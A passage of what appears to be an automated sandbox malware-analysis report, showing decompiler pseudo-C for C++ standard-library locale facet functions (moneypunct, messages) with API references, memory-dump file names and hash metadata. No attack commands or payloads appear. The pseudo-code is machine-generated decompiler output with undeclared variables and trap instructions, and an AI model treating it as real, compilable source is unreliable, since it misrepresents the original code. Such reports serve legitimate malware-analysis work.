																						_t518 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t259);
																						__eflags = _t518;
																						if(_t518 != 0) {
																							L47:
																							E6DDD66BA(_t550 - 0x14);
																							return E6DDF0075(_t518);
																						} else {
																							__eflags = _t531;
																							if(_t531 == 0) {
																								_push( *((intOrPtr*)(_t550 + 8)));
																								_push(_t550 - 0x10);
																								__eflags = E6DDE1409(_t389, _t434, _t510, _t518, _t531) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t550 - 0x20);
																									E6DDF3D74(_t550 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t389, _t518, _t531, 0x14);
																									E6DDD6653(_t550 - 0x14, 0);
																									_t532 =  *0x6de96de0; // 0x0
																									 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																									 *(_t550 - 0x10) = _t532;
																									_t272 = E6DDB161C(0x6de96d8c);
																									_t441 =  *((intOrPtr*)(_t550 + 8));
																									_t519 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t272);
																									__eflags = _t519;
																									if(_t519 != 0) {
																										L54:
																										E6DDD66BA(_t550 - 0x14);
																										return E6DDF0075(_t519);
																									} else {
																										__eflags = _t532;
																										if(_t532 == 0) {
																											_push( *((intOrPtr*)(_t550 + 8)));
																											_push(_t550 - 0x10);
																											__eflags = E6DDE1471(_t389, _t441, _t510, _t519, _t532) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t550 - 0x20);
																												E6DDF3D74(_t550 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t389, _t519, _t532, 0x14);
																												E6DDD6653(_t550 - 0x14, 0);
																												_t533 =  *0x6de96dfc; // 0x0
																												 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																												 *(_t550 - 0x10) = _t533;
																												_t285 = E6DDB161C(0x6de96da8);
																												_t448 =  *((intOrPtr*)(_t550 + 8));
																												_t520 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t285);
																												__eflags = _t520;
																												if(_t520 != 0) {
																													L61:
																													E6DDD66BA(_t550 - 0x14);
																													return E6DDF0075(_t520);
																												} else {
																													__eflags = _t533;
																													if(_t533 == 0) {
																														_push( *((intOrPtr*)(_t550 + 8)));
																														_push(_t550 - 0x10);
																														__eflags = E6DDE14EC(_t389, _t448, _t510, _t520, _t533) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t550 - 0x20);
																															E6DDF3D74(_t550 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t389, _t520, _t533, 0x14);
																															E6DDD6653(_t550 - 0x14, 0);
																															_t534 =  *0x6de96dcc; // 0x0
																															 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																															 *(_t550 - 0x10) = _t534;
																															_t298 = E6DDB161C(0x6de96d80);
																															_t455 =  *((intOrPtr*)(_t550 + 8));
																															_t521 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t298);
																															__eflags = _t521;
																															if(_t521 != 0) {
																																L68:
																																E6DDD66BA(_t550 - 0x14);
																																return E6DDF0075(_t521);
																															} else {
																																__eflags = _t534;
																																if(_t534 == 0) {
																																	_push( *((intOrPtr*)(_t550 + 8)));
																																	_push(_t550 - 0x10);
																																	__eflags = E6DDE1558(_t389, _t455, _t510, _t521, _t534) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t550 - 0x20);
																																		E6DDF3D74(_t550 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t389, _t521, _t534, 0x14);
																																		E6DDD6653(_t550 - 0x14, 0);
																																		_t535 =  *0x6de96e00; // 0x0
																																		 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																		 *(_t550 - 0x10) = _t535;
																																		_t311 = E6DDB161C(0x6de96dac);
																																		_t462 =  *((intOrPtr*)(_t550 + 8));
																																		_t522 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t311);
																																		__eflags = _t522;
																																		if(_t522 != 0) {
																																			L75:
																																			E6DDD66BA(_t550 - 0x14);
																																			return E6DDF0075(_t522);
																																		} else {
																																			__eflags = _t535;
																																			if(_t535 == 0) {
																																				_push( *((intOrPtr*)(_t550 + 8)));
																																				_push(_t550 - 0x10);
																																				__eflags = E6DDE15C4(_t389, _t462, _t510, _t522, _t535) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t550 - 0x20);
																																					E6DDF3D74(_t550 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t389, _t522, _t535, 0x14);
																																					E6DDD6653(_t550 - 0x14, 0);
																																					_t536 =  *0x6de96dd0; // 0x0
																																					 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																					 *(_t550 - 0x10) = _t536;
																																					_t324 = E6DDB161C(0x6de96d60);
																																					_t469 =  *((intOrPtr*)(_t550 + 8));
																																					_t523 = E6DDB171B( *((intOrPtr*)(_t550 + 8)), _t324);
																																					__eflags = _t523;
																																					if(_t523 != 0) {
																																						L82:
																																						E6DDD66BA(_t550 - 0x14);
																																						return E6DDF0075(_t523);
																																					} else {
																																						__eflags = _t536;
																																						if(_t536 == 0) {
																																							_push( *((intOrPtr*)(_t550 + 8)));
																																							_push(_t550 - 0x10);
																																							__eflags = E6DDE162A(_t389, _t469, _t510, _t523, _t536) - 0xffffffff;
																																							if(__eflags == 0) {
																																								_t473 = _t550 - 0x20;
																																								E6DDB1438(_t473);
																																								E6DDF3D74(_t550 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de3851f, _t389, _t523, _t536, 4);
																																								_t537 = _t473;
																																								 *(_t550 - 0x10) = _t537;
																																								 *((intOrPtr*)(_t537 + 4)) =  *((intOrPtr*)(_t550 + 0xc));
																																								_push( *((intOrPtr*)(_t550 + 0x14)));
																																								_t175 = _t550 - 4;
																																								 *_t175 =  *(_t550 - 4) & 0x00000000;
																																								__eflags =  *_t175;
																																								 *_t537 = 0x6de3c0c4;
																																								 *((char*)(_t537 + 0x28)) =  *((intOrPtr*)(_t550 + 0x10));
																																								E6DDE542F(_t389, _t473, _t510, _t523, _t537,  *_t175);
																																								return E6DDF0075(_t537,  *((intOrPtr*)(_t550 + 8)));
																																							} else {
																																								_t523 =  *(_t550 - 0x10);
																																								 *(_t550 - 0x10) = _t523;
																																								 *(_t550 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t523);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t523 + 4))))();
																																								 *0x6de96dd0 = _t523;
																																								goto L82;
																																							}
																																						} else {
																																							_t523 = _t536;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t522 =  *(_t550 - 0x10);
																																					 *(_t550 - 0x10) = _t522;
																																					 *(_t550 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t522);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t522 + 4))))();
																																					 *0x6de96e00 = _t522;
																																					goto L75;
																																				}
																																			} else {
																																				_t522 = _t535;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t521 =  *(_t550 - 0x10);
																																		 *(_t550 - 0x10) = _t521;
																																		 *(_t550 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t521);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t521 + 4))))();
																																		 *0x6de96dcc = _t521;
																																		goto L68;
																																	}
																																} else {
																																	_t521 = _t534;
																																	goto L68;
																																}
																															}
																														} else {
																															_t520 =  *(_t550 - 0x10);
																															 *(_t550 - 0x10) = _t520;
																															 *(_t550 - 4) = 1;
																															E6DDD6FD3(__eflags, _t520);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t520 + 4))))();
																															 *0x6de96dfc = _t520;
																															goto L61;
																														}
																													} else {
																														_t520 = _t533;
																														goto L61;
																													}
																												}
																											} else {
																												_t519 =  *(_t550 - 0x10);
																												 *(_t550 - 0x10) = _t519;
																												 *(_t550 - 4) = 1;
																												E6DDD6FD3(__eflags, _t519);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t519 + 4))))();
																												 *0x6de96de0 = _t519;
																												goto L54;
																											}
																										} else {
																											_t519 = _t532;
																											goto L54;
																										}
																									}
																								} else {
																									_t518 =  *(_t550 - 0x10);
																									 *(_t550 - 0x10) = _t518;
																									 *(_t550 - 4) = 1;
																									E6DDD6FD3(__eflags, _t518);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t518 + 4))))();
																									 *0x6de96ddc = _t518;
																									goto L47;
																								}
																							} else {
																								_t518 = _t531;
																								goto L47;
																							}
																						}
																					} else {
																						_t517 =  *(_t550 - 0x10);
																						 *(_t550 - 0x10) = _t517;
																						 *(_t550 - 4) = 1;
																						E6DDD6FD3(__eflags, _t517);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t517 + 4))))();
																						 *0x6de96db0 = _t517;
																						goto L40;
																					}
																				} else {
																					_t517 = _t530;
																					goto L40;
																				}
																			}
																		} else {
																			_t516 =  *(_t550 - 0x10);
																			 *(_t550 - 0x10) = _t516;
																			 *(_t550 - 4) = 1;
																			E6DDD6FD3(__eflags, _t516);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t516 + 4))))();
																			 *0x6de96dd8 = _t516;
																			goto L33;
																		}
																	} else {
																		_t516 = _t529;
																		goto L33;
																	}
																}
															} else {
																_t515 =  *(_t550 - 0x10);
																 *(_t550 - 0x10) = _t515;
																 *(_t550 - 4) = 1;
																E6DDD6FD3(__eflags, _t515);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t515 + 4))))();
																 *0x6de96dc4 = _t515;
																goto L26;
															}
														} else {
															_t515 = _t528;
															goto L26;
														}
													}
												} else {
													_t514 =  *(_t550 - 0x10);
													 *(_t550 - 0x10) = _t514;
													 *(_t550 - 4) = 1;
													E6DDD6FD3(__eflags, _t514);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t514 + 4))))();
													 *0x6de96dc8 = _t514;
													goto L19;
												}
											} else {
												_t514 = _t527;
												goto L19;
											}
										}
									} else {
										_t513 =  *(_t550 - 0x10);
										 *(_t550 - 0x10) = _t513;
										 *(_t550 - 4) = 1;
										E6DDD6FD3(__eflags, _t513);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t513 + 4))))();
										 *0x6de96df4 = _t513;
										goto L12;
									}
								} else {
									_t513 = _t526;
									goto L12;
								}
							}
						} else {
							_t512 =  *(_t550 - 0x10);
							 *(_t550 - 0x10) = _t512;
							 *(_t550 - 4) = 1;
							E6DDD6FD3(__eflags, _t512);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t512 + 4))))();
							 *0x6de96df8 = _t512;
							goto L5;
						}
					} else {
						_t512 = _t525;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF56E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF578
int.LIBCPMT ref: 6DDDF58F

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF5B2
std::_Facet_Register.LIBCPMT ref: 6DDDF5C9
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF5E9
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF607

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 3a5dfdc0b5aadda5e52500a7e801536c8d329c8e3c05306ba2d7da326e55a70c
Instruction ID: bbf2cf14f6da7ee62b644b220c3622372ad07b1e536659c19691d81e7bf8cfad
Opcode Fuzzy Hash: 3a5dfdc0b5aadda5e52500a7e801536c8d329c8e3c05306ba2d7da326e55a70c
Instruction Fuzzy Hash: 7311A076908119DBCF01FBA4C840ABEB775AF94318F260019F621AB290DF749A018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB7F2, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDEB7F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t330 - 0x14, 0);
				_t315 =  *0x6de96e2c; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6DDB161C(0x6de96e0c);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6DDD66BA(_t330 - 0x14);
					return E6DDF0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6DDEBFE8(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t330 - 0x20);
							E6DDF3D74(_t330 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t307, _t315, 0x14);
							E6DDD6653(_t330 - 0x14, 0);
							_t316 =  *0x6de96e30; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6DDB161C(0x6de96e10);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6DDD66BA(_t330 - 0x14);
								return E6DDF0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6DDEC050(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t330 - 0x20);
										E6DDF3D74(_t330 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t234, _t308, _t316, 0x14);
										E6DDD6653(_t330 - 0x14, 0);
										_t317 =  *0x6de96e34; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6DDB161C(0x6de96e14);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6DDD66BA(_t330 - 0x14);
											return E6DDF0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6DDEC0B8(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t330 - 0x20);
													E6DDF3D74(_t330 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t234, _t309, _t317, 0x14);
													E6DDD6653(_t330 - 0x14, 0);
													_t318 =  *0x6de96e3c; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6DDB161C(0x6de96e1c);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6DDD66BA(_t330 - 0x14);
														return E6DDF0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6DDEC120(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t330 - 0x20);
																E6DDF3D74(_t330 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t234, _t310, _t318, 0x14);
																E6DDD6653(_t330 - 0x14, 0);
																_t319 =  *0x6de96e38; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6DDB161C(0x6de96e18);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6DDD66BA(_t330 - 0x14);
																	return E6DDF0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6DDEC1A4(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t330 - 0x20);
																			E6DDF3D74(_t330 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t234, _t311, _t319, 0x14);
																			E6DDD6653(_t330 - 0x14, 0);
																			_t320 =  *0x6de96e40; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6DDB161C(0x6de96e20);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6DDD66BA(_t330 - 0x14);
																				return E6DDF0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6DDEC229(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t330 - 0x20);
																						E6DDF3D74(_t330 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t234, _t312, _t320, 0x14);
																						E6DDD6653(_t330 - 0x14, 0);
																						_t321 =  *0x6de96e44; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6DDB161C(0x6de96e24);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6DDD66BA(_t330 - 0x14);
																							return E6DDF0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6DDEC295(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6DDB1438(_t283);
																									E6DDF3D74(_t330 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de3851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6de3c414;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6DDED028(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6DDF0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6DDD6FD3(__eflags, _t313);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6de96e44 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6DDD6FD3(__eflags, _t312);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6de96e40 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6DDD6FD3(__eflags, _t311);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6de96e38 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6DDD6FD3(__eflags, _t310);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6de96e3c = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6DDD6FD3(__eflags, _t309);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6de96e34 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6DDD6FD3(__eflags, _t308);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6de96e30 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6DDD6FD3(__eflags, _t307);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6de96e2c = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEB7F9
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB803
int.LIBCPMT ref: 6DDEB81A

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

messages.LIBCPMT ref: 6DDEB83D
std::_Facet_Register.LIBCPMT ref: 6DDEB854
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB874
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB892

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 027a0296ad6a7e9d13fc5d07de8afa29cf3e2d7cf26dccb9360f6f11f8903932
Instruction ID: 3d5c7db72d894c78826fa1c962fb8e402ba071d8a6e8d0ec7e81751fc1f3d6f5
Opcode Fuzzy Hash: 027a0296ad6a7e9d13fc5d07de8afa29cf3e2d7cf26dccb9360f6f11f8903932
Instruction Fuzzy Hash: D5119E75808229DBCF05FBA4C880ABDB7B5AF44718F274019F511AB390DF75AA058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB74C, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDEB74C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t374 - 0x14, 0);
				_t357 =  *0x6de96e28; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6DDB161C(0x6de96e08);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6DDD66BA(_t374 - 0x14);
					return E6DDF0075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6DDEBF46(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t374 - 0x20);
							E6DDF3D74(_t374 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t348, _t357, 0x14);
							E6DDD6653(_t374 - 0x14, 0);
							_t358 =  *0x6de96e2c; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6DDB161C(0x6de96e0c);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6DDD66BA(_t374 - 0x14);
								return E6DDF0075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6DDEBFE8(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t374 - 0x20);
										E6DDF3D74(_t374 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t265, _t349, _t358, 0x14);
										E6DDD6653(_t374 - 0x14, 0);
										_t359 =  *0x6de96e30; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6DDB161C(0x6de96e10);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6DDD66BA(_t374 - 0x14);
											return E6DDF0075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6DDEC050(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t374 - 0x20);
													E6DDF3D74(_t374 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t265, _t350, _t359, 0x14);
													E6DDD6653(_t374 - 0x14, 0);
													_t360 =  *0x6de96e34; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6DDB161C(0x6de96e14);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6DDD66BA(_t374 - 0x14);
														return E6DDF0075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
